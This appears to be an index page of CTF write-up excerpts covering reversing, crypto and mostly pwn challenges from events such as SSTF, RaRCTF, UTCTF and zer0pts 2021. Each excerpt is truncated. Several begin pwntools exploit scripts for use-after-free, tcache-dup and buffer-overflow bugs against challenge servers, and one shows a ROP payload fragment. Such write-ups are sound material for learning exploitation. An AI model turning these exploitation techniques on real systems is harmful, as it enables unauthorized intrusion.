CTF Write-Up

    [ASCTF 2021] Challenge Author Write-up [Rev(1), MISC&Crypto(3), Pwn(5)]

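    🧡 Rev - One Time Pad This is actually a program I wrote during the KUCIS Project; it was originally a program meant only for socket communication. It is a custom algorithm that came out of researching ways to use OTP in practice. Decryption can be performed using the following. 🎃 Flag: ASCTF{C#_is_shy} 🧡 MISC - 찌릿찌릿 (Tingle Tingle) Opening the flag.txt file shows base64-encoded text. What do we get when we decode it? Decrypting that content with a Caesar cipher, key=6, gives the following. The challenge also gave a hint with a picture of Pikachu. It is a Brainfuck language called Pikalang. URL: https://www.dcode.fr/pikalang-language Pikalang Prog..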

    [SSTF 2021] Hackers Playground Writeup

    🧡 LostArk Simple UAF problem 😉 from pwn import * context.log_level = 'debug' #p = process('./lostark') p = remote('lostark.sstf.site', 1337) def create(idx, name): p.sendlineafter(':', '1') p.sendlineafter(':', str(idx)) if idx == 7: return else: p.sendlineafter(':', name) def delete(idx): p.sendlineafter(':', '2') p.sendlineafter(':', str(idx)) def choose(idx): p.sendlineafter(':', '4') p.sendl..

    [RaRCTF 2021] Only Pwn Writeup

    >︿< (Plz turn on the black mode) I started two days late, so I didn't solve many problems. 🧡 Archer (100 points) undefined8 main(void) { char *pcVar1; char local_d [5]; puts("It\'s battle day archer! Have you got what it takes?"); printf("Answer [yes/no]: "); fflush(stdout); fgets(local_d,5,stdin); pcVar1 = strstr(local_d,"no"); if (pcVar1 != (char *)0x0) { puts("Batt..

    [UDCTF 2021 | BlueHens 2021] Partial Writeup

    Encrheapt just malloc and free tcache dup. it's freaking easy. just do it from pwn import * #context.log_level = 'debug' #p = process("./a.out") p = remote("challenges.ctfd.io", 30028) def encrypt(ch, size, con): p.sendlineafter('3. Exit\n', '1') p.sendlineafter('2)??: ', str(ch)) p.sendlineafter(' key?:', '1') p.sendlineafter('How much would you like to encrypt: ', str(size)) p.sendlineafter('W..

    [UTCTF 2021] Partial Writeup

    Monke so we should set can_eat to 0 to use tcache dup. when we type a char except 'w', 'e', 's', 'n', we can set can_eat to 0. and we can leak to free unsorted bin and read the name of banana (which has been freed). so I know libc_addr and we can AAW by tcache dup let's play~ from pwn import * p = remote("pwn.utctf.live", 9999) elf = ELF("./monke") libc = ELF("./libc-2.27.so") def walk(d): p.sen..

    [zer0pts CTF 2021] Partial Writeup

    Infected The goal of this problem is to access /root directory. Upon extraction, the backdoor file and the pow.py file are located. First, let's analyze pow.py. """ i.e. sha256("????v0iRhxH4SlrgoUd5Blu0") = b788094e2d021fa16f30c83346f3c80de5afab0840750a49a9254c2a73ed274c Suffix: v0iRhxH4SlrgoUd5Blu0 Hash: b788094e2d021fa16f30c83346f3c80de5afab0840750a49a9254c2a73ed274c """ import itertools impor..

    [TrollCat CTF] Only Pwnable WriteUp

    Thoughts Using only the bad func, we can't exploit the BOF vulnerability (the length of bad_thought is 0x20 and the dest variable is at [ebp - 0x28]). But using good_thought, we can concatenate the two strings, the good and bad thoughts. Then the 'strcpy' call in the bad func copies the big string (bad + good thought) to the dest variable. Look at the exploit code. from pwn import * p = remote("157.230.33.195", 111..

    [0x41414141 CTF] Only Pwnable Writeup

    moving-signals There's only a __start function. It consists of simple assembly. Given that there is no NX bit, it seems to be a problem using shellcode (asm). In addition, /bin/sh is at 0x41250. I will use the following payload to leak the stack address. (ROP, RTL chain) payload = 'A'*8 + p64(0x41018) + p64(0x1) + p64(0x41000) + p64(0x41018) + p64(0x0) + p64(0x41000) It is a payload that sets rax..